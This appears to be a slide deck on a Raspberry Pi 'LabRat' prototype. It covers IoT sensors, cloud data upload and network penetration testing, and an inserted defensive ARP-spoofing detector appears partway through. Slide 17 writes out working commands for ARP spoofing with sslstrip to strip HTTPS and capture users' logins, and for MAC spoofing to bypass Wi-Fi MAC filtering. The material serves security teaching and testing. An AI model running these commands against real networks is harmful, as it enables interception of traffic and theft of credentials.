The document provides information about using a Raspberry Pi device called the LabRat to perform physical penetration testing and assess Internet of Things (IoT) security. It describes how the LabRat prototype uses sensors to measure temperature and humidity and transmits data over optical fibers. It also lists penetration testing tools preloaded on the LabRat and demonstrates ARP spoofing, MAC spoofing, and packet sniffing attacks. The document aims to show how the LabRat could be used to automatically monitor equipment and send sensor data to cloud services for real-time analytics, as a proof of concept for assessing IoT security.
3. Raspberry Pi as a Physical Backdoor into your network
http://securityaffairs.co/wordpress/15471/hacking/raspberry-pi-as-physical-backdoor.html
It's a device "you can just plug in and do a full-scale penetration test from start to finish," Porcello says. "The enterprise can use stuff like this to do testing more often and more cheaply than they're doing it right now."
-- CEO of Pwnie Express, Dave Porcello
• Rogue APs
• MAC Spoofing on wired networks
• MITM attacks
5. The LabRat: a Proof of Concept Prototype
The Raspberry Pi, a $35 Linux computer, powers the LabRat prototype.
To get more info on the Raspberry Pi, visit http://www.raspberrypi.org/
6. The LabRat Prototype: Current Setup
• 10 inch capacitive touchscreen
• Optical fiber tester
• Humidity sensor
• Temperature sensor
• Raspberry Pi
• HDMI-to-LVDS converter board
• 10,000 mAh lithium polymer battery
7. The LabRat Prototype: LM35 + ADS7841 Temperature Sensor
• LM35 temperature sensor
• ADS7841 analog-to-digital converter
9. The LabRat Prototype: Optical Fiber Tester
• Optical fiber holders
• Infra-red LED-receiver combination to transmit messages via the fiber
10. Connecting to an IoT Cloud
• https://xively.com/
• Formerly Cosm, Pachube
11. Set up a Cosm (now Xively) Account
• Register on Cosm (Xively) and add a device
• You will receive an API Key and a Feed ID
• Now use the old Cosm eeml library to set up datastreams from the Raspberry Pi
12. Setting up the Python Script to send Data to Xively
Install the EEML package from GitHub:
sudo apt-get install python-dev
sudo apt-get install python-pip
sudo easy_install -U distribute
sudo pip install rpi.gpio   # needed to work with the RPi GPIO pins
wget -O geekman-python-eeml.tar.gz https://github.com/geekman/python-eeml/tarball/master
tar zxvf geekman-python-eeml.tar.gz
cd geekman-python-eeml*
sudo python setup.py install
Set up the Python script:
# import the eeml package installed above
import eeml
<snip>
API_KEY = 'YOUR_API_KEY'
FEED = YOUR_FEED_ID
API_URL = '/v2/feeds/{feednum}.xml'.format(feednum=FEED)
13. The LabRat Prototype: Online Real-Time Feed, Temperature and Humidity
Visit the real-time feed at https://cosm.com/feeds/89297
14. The LabRat Prototype: Python Scripts
1) A Python script to upload the temperature and humidity data to an online cloud-based feed, showing how the LabRat may in future do the same with sensory data at customer labs to provide real-time analytics.
2) The same Python script sends an email to lab admins whenever the temperature or humidity values exceed a pre-decided threshold.
3) Another Python script to send messages (binary data) through an optical fiber using an infrared LED-receiver combination and email the data to the user. The same data may later be uploaded to an inventory management system to automatically track working equipment and its performance.
16. DEMO
- ARP spoofing using sslstrip and arpspoof
- MAC spoofing using airmon-ng and macchanger
- Packet sniffing using Wireshark
- Other MITM attacks
17. ARP Spoofing and MAC Spoofing Attacks
ARP Spoofing
• Set up port forwarding
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
echo '1' > /proc/sys/net/ipv4/ip_forward
• Start ARP spoofing. Spoof the gateway:
arpspoof -i wlan0 <gateway address>
• Start sslstrip and log user information (use the -k option to log users out of their current sessions, forcing them to re-login)
sslstrip -k -l 8080
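A defender's counterpart to the demo above, as an added example that is not part of the LabRat deck: a small Python detector replays captured ARP replies (constructed sample data with hypothetical addresses) and flags the two traces this kind of ARP poisoning leaves in a capture, the gateway IP answering from a new MAC and one MAC claiming several IPs.

```python
"""Detector for the ARP cache poisoning shown in the slide above.

Added example, not from the LabRat deck. Replays observed ARP replies and
flags two poisoning signatures:
  1. an IP (especially the gateway) that suddenly answers from another MAC;
  2. a single MAC that claims to own more than one IP address.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    sender_ip: str
    sender_mac: str


# Constructed sample capture with hypothetical addresses: .1 is the gateway
# (real MAC aa:...:01); a third host (de:ad:...) later answers for it.
SAMPLE_REPLIES = [
    ArpReply("192.168.1.1", "aa:bb:cc:dd:ee:01"),
    ArpReply("192.168.1.20", "aa:bb:cc:dd:ee:20"),
    ArpReply("192.168.1.1", "aa:bb:cc:dd:ee:01"),
    ArpReply("192.168.1.1", "de:ad:be:ef:00:01"),   # poisoned reply
    ArpReply("192.168.1.50", "de:ad:be:ef:00:01"),  # the poisoner's own IP
]


def detect_arp_spoofing(replies, gateway_ip):
    """Return alert strings in capture order; an empty list means clean."""
    ip_to_mac = {}                 # last MAC seen for each IP
    mac_to_ips = defaultdict(set)  # every IP each MAC has claimed
    alerts = []
    for r in replies:
        mac = r.sender_mac.lower()
        known = ip_to_mac.get(r.sender_ip)
        if known is not None and known != mac:
            role = "gateway" if r.sender_ip == gateway_ip else "host"
            alerts.append(f"{role} {r.sender_ip} moved from {known} to {mac}")
        ip_to_mac[r.sender_ip] = mac
        before = len(mac_to_ips[mac])
        mac_to_ips[mac].add(r.sender_ip)
        # Alert once per newly claimed IP, not on every repeated reply
        if len(mac_to_ips[mac]) > 1 and len(mac_to_ips[mac]) > before:
            alerts.append(f"{mac} claims {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoofing(SAMPLE_REPLIES, "192.168.1.1"):
        print("ALERT:", line)
```

On a real network the same logic runs over ARP replies read from the interface or a pcap; a static ARP entry for the gateway on monitored hosts removes the first signature entirely.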
MAC Spoofing on WiFi (how to bypass MAC filtering)
• ifconfig eth0 down
• airmon-ng start wlan0
• iwlist wlan0 scanning
• airodump-ng -c 6 -a --bssid <mac address of wireless access point>
--- gives info on connected devices
• ifconfig wlan0 down
• Now use macchanger:
• macchanger -m <mac of allowed device> wlan0
• ifconfig wlan0 up